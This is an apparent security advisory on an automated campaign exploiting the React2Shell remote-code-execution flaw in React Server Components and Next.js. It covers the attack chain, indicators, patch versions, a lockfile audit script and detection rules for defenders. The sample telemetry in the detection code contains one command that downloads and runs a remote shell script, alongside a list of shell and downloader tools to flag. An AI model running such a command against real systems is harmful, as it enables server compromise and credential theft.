Hackers Exploit React2Shell in Automated Credential Theft Campaign
Apr 6, 2026
Summary
A large-scale cyber campaign is actively exploiting the critical React2Shell (CVE-2025-55182) vulnerability to compromise web applications and steal credentials. Threat actors are automating the exploitation process, scanning the internet for vulnerable React and Next.js applications, and deploying payloads that enable credential harvesting, malware delivery, and persistent access.
The campaign highlights how quickly attackers weaponize newly disclosed vulnerabilities—especially those enabling unauthenticated remote code execution (RCE).
Threat Overview
| Category | Details |
|---|---|
| Threat Type | Automated exploitation & credential theft |
| Vulnerability | CVE-2025-55182 (React2Shell) |
| Severity | Critical (CVSS 10.0) |
| Target | React Server Components / Next.js apps |
| Attack Vector | Malicious HTTP requests (unauthenticated) |
| Impact | Credential theft, malware deployment, server compromise |
| Activity Level | Active, large-scale exploitation |
What is React2Shell?
React2Shell is a critical unauthenticated remote code execution (RCE) vulnerability affecting React Server Components.
It allows attackers to execute arbitrary code on a server by sending a specially crafted HTTP request—without requiring authentication.
Because React powers a massive portion of modern web applications, the attack surface is extremely large, making this vulnerability particularly dangerous.
How the Attack Works
1. Internet-Wide Scanning
Threat actors begin by scanning the internet for exposed applications using vulnerable versions of React or Next.js.
- Automated tools probe endpoints at scale
- Vulnerable servers are quickly identified
- Exploitation attempts begin almost immediately after discovery
This rapid scanning behavior has been widely observed across multiple campaigns.
2. Exploiting the RCE Flaw
Attackers send specially crafted HTTP requests that exploit unsafe deserialization in React Server Components.
- No login required
- A single request can trigger execution
- Works on exposed production and dev environments
This gives attackers full control over the server process.
3. Payload Deployment
Once access is gained, attackers deploy second-stage payloads:
- Credential stealers
- Cryptominers (e.g., XMRig)
- Backdoors and remote access tools
In some observed cases, shell scripts are downloaded and executed to establish persistence.
4. Credential Theft & Persistence
The primary objective of this campaign is credential harvesting.
Attackers:
- Extract stored credentials and environment variables
- Capture API keys and tokens
- Maintain persistence via backdoors or scheduled tasks
This allows long-term access and potential lateral movement across infrastructure.
Why This Campaign Is Dangerous
Fully Automated Exploitation
Attackers are not manually targeting victims—this campaign is fully automated, enabling:
- Massive-scale attacks
- Rapid compromise after vulnerability disclosure
- Continuous scanning and reinfection attempts
Global Targeting
Organizations across industries and regions are affected due to the widespread use of React.
Multiple threat actors—including cybercriminal and state-linked groups—have been observed exploiting the flaw.
No Authentication Required
The vulnerability requires no credentials or user interaction, making it extremely easy to exploit.
Broad Ecosystem Impact
React2Shell impacts:
- React 19.x environments
- Next.js applications (App Router)
- Any framework using React Server Components
Indicators of Compromise (IOCs)
Security teams should watch for:
- Suspicious HTTP requests targeting RSC endpoints
- Unexpected shell script execution
- Outbound connections to unknown IPs
- Presence of cryptominers or unknown binaries
- Unauthorized changes in server files
Mitigation & Recommendations
Patch Immediately
Upgrade to secure versions:
- React Server Components: 19.0.1 / 19.1.2 / 19.2.1 or later
- Next.js patched versions
Patching is the most critical defense.
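Checking whether a deployment is on a fixed line is easy to get wrong when several 19.x branches each have their own fix release, so here is an added example (not code from the article or from the React project) that audits a package-lock.json against the three versions named above. It assumes the lockfileVersion 2/3 `packages` layout, that only React 19.x is affected (as the article states), and that the package names listed in RSC_PACKAGES are the ones worth checking; Next.js itself is not covered.

```javascript
// Added example (not from the original article): audit a package-lock.json
// (lockfileVersion 2/3 "packages" map) against the fixed React versions the
// advisory names: 19.0.1, 19.1.2 and 19.2.1. Assumptions: only React 19.x lines
// are affected (as stated above); later 19.x minors were cut after the fix; the
// set of package names to check is ours, and Next.js itself is not covered here.
const RSC_PACKAGES = new Set([
  'react', 'react-dom', 'react-server-dom-webpack',
  'react-server-dom-turbopack', 'react-server-dom-parcel',
]);
// minor line -> first patched patch level (19.0.1 / 19.1.2 / 19.2.1)
const FIXED_PATCH = new Map([[0, 1], [1, 2], [2, 1]]);

function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(String(v).trim());
  return m ? { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] ?? null } : null;
}

// 'vulnerable' | 'patched' | 'not-affected' | 'review' (prerelease/canary builds
// do not compare cleanly against release numbers and need a manual check)
function classifyReactVersion(v) {
  const p = parseVersion(v);
  if (!p) return 'review';
  if (p.major !== 19) return 'not-affected';
  if (p.pre) return 'review';
  const fixed = FIXED_PATCH.get(p.minor);
  if (fixed === undefined) return 'patched'; // 19.3+ postdates the fixes
  return p.patch >= fixed ? 'patched' : 'vulnerable';
}

// Walk every installed copy, including nested duplicates under other packages.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages ?? {})) {
    const name = path.split('node_modules/').pop(); // handles nesting and @scopes
    if (!RSC_PACKAGES.has(name) || !meta.version) continue;
    const status = classifyReactVersion(meta.version);
    if (status === 'vulnerable' || status === 'review') findings.push({ path, version: meta.version, status });
  }
  return findings;
}

// Constructed lockfile: one vulnerable react, one patched react-dom, one canary
// RSC package and a nested React 18 copy that is out of scope.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'shop-frontend' },
    'node_modules/react': { version: '19.1.1' },
    'node_modules/react-dom': { version: '19.1.2' },
    'node_modules/react-server-dom-webpack': { version: '19.2.0-canary-abcdef12-20250908' },
    'node_modules/legacy-widget/node_modules/react': { version: '18.3.1' },
  },
};
```

Run `auditLockfile(JSON.parse(fs.readFileSync('package-lock.json', 'utf8')))` against a real lockfile; anything reported as `review` still needs a manual comparison with the vendor advisory.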
Monitor Logs
- Track unusual API requests
- Analyze application logs for exploitation patterns
- Monitor for anomalous process execution
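The indicators listed above and the log-monitoring advice here can be turned into concrete rules. The following is an added example (not code from the article) with two such rules over constructed sample telemetry: one flags a source IP firing server-function calls at many unrelated paths in a short window (the automated probing described earlier), the other flags the Node runtime spawning a shell or downloader. It assumes the reverse proxy logs requests as JSON with lower-cased header names, that Next.js marks server-function calls with a `Next-Action` header, and that the app runtime appears as parent process `node` in process telemetry.

```javascript
// Added example (not from the original article): two detection rules for the
// indicators listed above, run over constructed sample telemetry.
// Assumptions: the proxy logs requests as JSON with lower-cased header names;
// Next.js marks server-function calls with a "Next-Action" header; process
// telemetry is {ts, parent, child, cmdline} and the app runtime appears as
// parent "node" (adjust NODE_PARENTS for your platform).
// Constructed access log: 203.0.113.7 posts server-function calls to several
// unrelated paths within about a second, the automated probing described above.
const ACCESS_LOG = [
  { ts: 1000, ip: '203.0.113.7', method: 'POST', path: '/', headers: { 'next-action': 'a1b2' }, status: 500 },
  { ts: 1400, ip: '203.0.113.7', method: 'POST', path: '/login', headers: { 'next-action': 'a1b2' }, status: 500 },
  { ts: 1800, ip: '203.0.113.7', method: 'POST', path: '/api/health', headers: { 'next-action': 'a1b2' }, status: 404 },
  { ts: 2200, ip: '203.0.113.7', method: 'POST', path: '/dashboard', headers: { 'next-action': 'a1b2' }, status: 500 },
  { ts: 3000, ip: '198.51.100.9', method: 'POST', path: '/checkout', headers: { 'next-action': 'c3d4' }, status: 200 },
  { ts: 3500, ip: '198.51.100.9', method: 'GET', path: '/checkout', headers: { rsc: '1' }, status: 200 },
];

// Rule 1: one source IP invoking server functions against many distinct paths
// inside a short window. Real clients call the actions of the page they are on.
function detectRscScanners(entries, { minDistinctPaths = 3, windowMs = 60_000 } = {}) {
  const byIp = new Map();
  for (const e of entries) {
    if (e.method !== 'POST' || !e.headers || !('next-action' in e.headers)) continue;
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }
  const hits = [];
  for (const [ip, reqs] of byIp) {
    reqs.sort((a, b) => a.ts - b.ts);
    let lo = 0, best = 0;
    for (let hi = 0; hi < reqs.length; hi++) { // sliding time window
      while (reqs[hi].ts - reqs[lo].ts > windowMs) lo++;
      best = Math.max(best, new Set(reqs.slice(lo, hi + 1).map((r) => r.path)).size);
    }
    if (best >= minDistinctPaths) hits.push({ ip, distinctPaths: best });
  }
  return hits;
}

// Constructed process telemetry: the runtime spawning a shell that fetches a
// script is the "unexpected shell script execution" indicator listed above.
const PROCESS_EVENTS = [
  { ts: 2300, parent: 'node', child: 'sh', cmdline: 'sh -c "curl -s http://192.0.2.55/s.sh | sh"' },
  { ts: 9000, parent: 'node', child: 'node', cmdline: 'node scripts/nightly-report.js' },
  { ts: 9500, parent: 'bash', child: 'curl', cmdline: 'curl https://registry.npmjs.org/' },
];
const NODE_PARENTS = new Set(['node']);
const SUSPICIOUS_CHILDREN = new Set(['sh', 'bash', 'dash', 'curl', 'wget']);
// Rule 2: a web-server runtime should never be the parent of a shell or downloader.
function detectShellFromNode(events) {
  return events.filter((ev) => NODE_PARENTS.has(ev.parent) && SUSPICIOUS_CHILDREN.has(ev.child));
}
```

Tune `minDistinctPaths` and `windowMs` to the site's normal traffic; rule 2 has almost no legitimate matches for a production Next.js server and is worth alerting on directly.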
Secure Secrets
- Rotate API keys and credentials
- Avoid storing secrets in environment variables without protection
- Use secure vaults
Restrict Exposure
- Limit public access to development servers
- Use WAF rules to block suspicious payloads
- Implement network segmentation
ClearPhish Takeaway
The React2Shell campaign is a textbook example of how critical vulnerabilities evolve into automated attack pipelines within days of disclosure.
For organizations, the lesson is clear:
If a vulnerability allows unauthenticated RCE, assume it will be exploited at scale—immediately.
Security awareness, rapid patching, and proactive monitoring are no longer optional—they are essential.